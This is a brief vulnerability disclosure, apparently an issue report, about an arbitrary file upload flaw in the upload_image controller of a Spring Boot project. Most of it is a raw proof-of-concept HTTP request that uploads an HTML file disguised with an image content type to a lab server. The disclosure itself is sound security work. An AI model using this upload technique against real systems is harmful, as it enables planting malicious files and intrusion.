There is an Arbitrary File Upload in src/main/java/com/wuhao/wuhaozn_springboot/control/upload_image.java

[N0boy-0]

The system does not detect file suffixes uploaded by users, resulting in arbitrary file upload vulnerabilities.

main data package:

POST /upload_image HTTP/1.1
Host: 10.25.10.161:8181
Content-Length: 249
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKFB0HQ4zX4BVqzPM
Origin: http://10.25.10.161:8181
Referer: http://10.25.10.161:8181/company
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B7449A405FFEABFC4AC760AC694C8F4A
Connection: close

------WebKitFormBoundaryKFB0HQ4zX4BVqzPM
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: image/jpeg

<html><title>test</title><body><h1>this is a test!</h1></body></html>
------WebKitFormBoundaryKFB0HQ4zX4BVqzPM--

You can see that the file was successfully uploaded and can be accessed directly.